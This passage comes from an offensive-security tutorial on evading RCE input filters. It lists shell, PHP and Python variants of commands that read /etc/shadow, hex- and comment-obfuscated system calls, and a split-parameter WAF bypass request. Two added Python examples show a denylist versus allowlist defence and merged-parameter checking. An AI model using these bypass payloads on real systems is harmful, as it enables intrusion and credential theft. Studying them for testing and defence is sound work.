Bypassing RCE Protection
Many applications have caught on to the dangers of RCE and employ either input validation or a firewall to stop potentially malicious requests. But programming languages are often quite flexible, and that enables us to work within the bounds of the input validation rules to make our attack work! Here are some basic input validation bypasses you can try in case the application is blocking your payloads.
For Unix system commands, you can insert quotes and double quotes without changing the command’s behavior. You can also use wildcards to substitute for arbitrary characters if the system is filtering out certain strings. Finally, any empty command substitution results can be inserted into the string without changing the results. For example, the following commands will all print the contents of /etc/shadow:
cat /etc/shadow
cat "/e"tc'/shadow'
cat /etc/sh*dow
cat /etc/sha``dow
cat /etc/sha$()dow
cat /etc/sha${}dow
You can also vary the way you write the same command in PHP. For example, PHP allows you to concatenate function names as strings. You can even hex-encode function names, or insert PHP comments in commands without changing their outcome:
/* Text surrounded by these brackets is a comment in PHP. */
For example, say you want to execute this system command in PHP:
system('cat /etc/shadow');
The following example executes a system command by concatenating the strings sys and tem:
('sys'.'tem')('cat /etc/shadow');
The following example does the same thing but inserts a blank comment in the middle of the command:
system/**/('ls');
And this line of code is a hex-encoded version of the system command:
"\x73\x79\x73\x74\x65\x6d"('ls');
Similar behavior exists in Python. The following are all equivalent in Python syntax:
__import__('os').system('cat /etc/shadow')
__import__('o'+'s').system('cat /etc/shadow')
__import__('\x6f\x73').system('cat /etc/shadow')
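Every variant above, in the shell, PHP and Python alike, defeats a filter that looks for one literal spelling of the command. The following added example (not from the book) runs the book's Unix variants through a substring denylist and then through positive validation for a hypothetical ping endpoint that accepts only a hostname and executes it as an argv list, so no shell ever parses the value. The endpoint, the denylist contents and the hostname rule are assumptions.

```python
"""Denylist versus allowlist for a command argument (added example)."""
import re
import subprocess

# The book's Unix variants of one command, used here as constructed test input.
PAGE_VARIANTS = [
    "cat /etc/shadow",
    "cat \"/e\"tc'/shadow'",
    "cat /etc/sh*dow",
    "cat /etc/sha``dow",
    "cat /etc/sha$()dow",
]

# A typical denylist: exact substrings only (assumed contents).
DENYLIST = ("cat /etc/shadow", "/etc/passwd")

def denylist_allows(value: str) -> bool:
    """Naive filter. Returns True when no denylisted substring is present."""
    return not any(bad in value for bad in DENYLIST)

# Positive validation: a syntactically valid hostname and nothing else.
HOSTNAME_RE = re.compile(
    r"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)

def allowlist_allows(value: str) -> bool:
    """Returns True only for a plain hostname; quotes, spaces, globs, $() all fail."""
    return len(value) <= 253 and HOSTNAME_RE.match(value) is not None

def build_ping_argv(host: str) -> list:
    """Hardened handler for a hypothetical /ping?host= endpoint: validate, then
    build an argv list so the value is never interpreted by a shell."""
    if not allowlist_allows(host):
        raise ValueError("rejected: not a hostname")
    return ["ping", "-c", "1", host]

def run_ping(host: str) -> int:
    """shell=False (the default): metacharacters in host would be inert anyway."""
    return subprocess.run(build_ping_argv(host), check=False).returncode

if __name__ == "__main__":
    for v in PAGE_VARIANTS + ["example.com"]:
        print(f"denylist={denylist_allows(v)!s:<5} allowlist={allowlist_allows(v)!s:<5} {v!r}")
```

Only the first variant is caught by the denylist; the allowlist rejects all five because none of them is a hostname, which is the property that actually matters.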
Additionally, some servers concatenate the values of multiple parameters that have the same name into a single value. In this case, you can split malicious code into chunks to bypass input validation. For example, if the firewall blocks requests that contain the string system, you can split your RCE payload into chunks, like so:
GET /calculator?calc="__import__('os').sy"&calc="stem('ls')"
Host: example.com
The parameters will get through the firewall without issue, since the request technically doesn’t contain the string system. But when the server processes the request, the parameter values will be concatenated into a single string that forms our RCE payload: "__import__('os').system('ls')".
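The defensive lesson of the request above is that a filter must inspect the value the backend will process, not each parameter instance in isolation. The following added example (not from the book) parses the book's query string, runs the "system" check per parameter and then over the concatenated value, and also shows the stricter option of refusing any repeated parameter name. The query is constructed from the book's request with the surrounding quotes treated as delimiters, and the "first"/"last" merge policies are assumed alternatives to the concatenation the book describes.

```python
"""Filtering that accounts for same-name parameter concatenation (added example)."""
from urllib.parse import parse_qs

BLOCKED = ("system",)

# Constructed from the book's request; the surrounding quotes are taken as
# delimiters rather than part of the values.
QUERY = "calc=__import__('os').sy&calc=stem('ls')"

def parse(query: str) -> dict:
    """Parse into name -> list of every instance, preserving order."""
    return parse_qs(query, keep_blank_values=True)

def per_parameter_blocked(params: dict) -> bool:
    """Naive WAF: each parameter instance is inspected on its own."""
    return any(b in v for vals in params.values() for v in vals for b in BLOCKED)

def backend_view(params: dict, policy: str = "concat") -> dict:
    """Reconstruct the value the application will see for a duplicated name.
    'concat' is the behaviour the book describes; 'first' and 'last' are the
    other common framework policies (assumed, not from the book)."""
    merged = {}
    for name, vals in params.items():
        if policy == "concat":
            merged[name] = "".join(vals)
        elif policy == "first":
            merged[name] = vals[0]
        elif policy == "last":
            merged[name] = vals[-1]
        else:
            raise ValueError(f"unknown policy {policy!r}")
    return merged

def merged_blocked(params: dict, policy: str = "concat") -> bool:
    """Same substring check, but over what the backend actually processes."""
    return any(b in v for v in backend_view(params, policy).values() for b in BLOCKED)

def has_duplicate_parameter(params: dict) -> bool:
    """Stricter option: refuse the request when any name appears more than once."""
    return any(len(vals) > 1 for vals in params.values())

if __name__ == "__main__":
    p = parse(QUERY)
    print("per-parameter blocked:", per_parameter_blocked(p))
    print("merged (concat):", backend_view(p)["calc"], "blocked:", merged_blocked(p))
    print("duplicate parameter present:", has_duplicate_parameter(p))
```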
This is only a tiny subset of filter bypasses you can try; many more exist. For example, you can hex-encode, URL-encode, double-URL-encode, and vary the cases (uppercase or lowercase characters) of your payloads. You can also try to insert special characters such as null bytes, newline characters, escape characters (\), and other special or non-ASCII characters into the payload. Then, observe which payloads are blocked and which ones succeed, and craft exploits that will bypass the filter to accomplish your desired results. If you’re interested in this topic, search online for RCE filter bypass or WAF bypass to learn more. Additionally, the principles mentioned in this section can be used to bypass input validation for other vulnerabilities as well, such as SQL injection and XSS.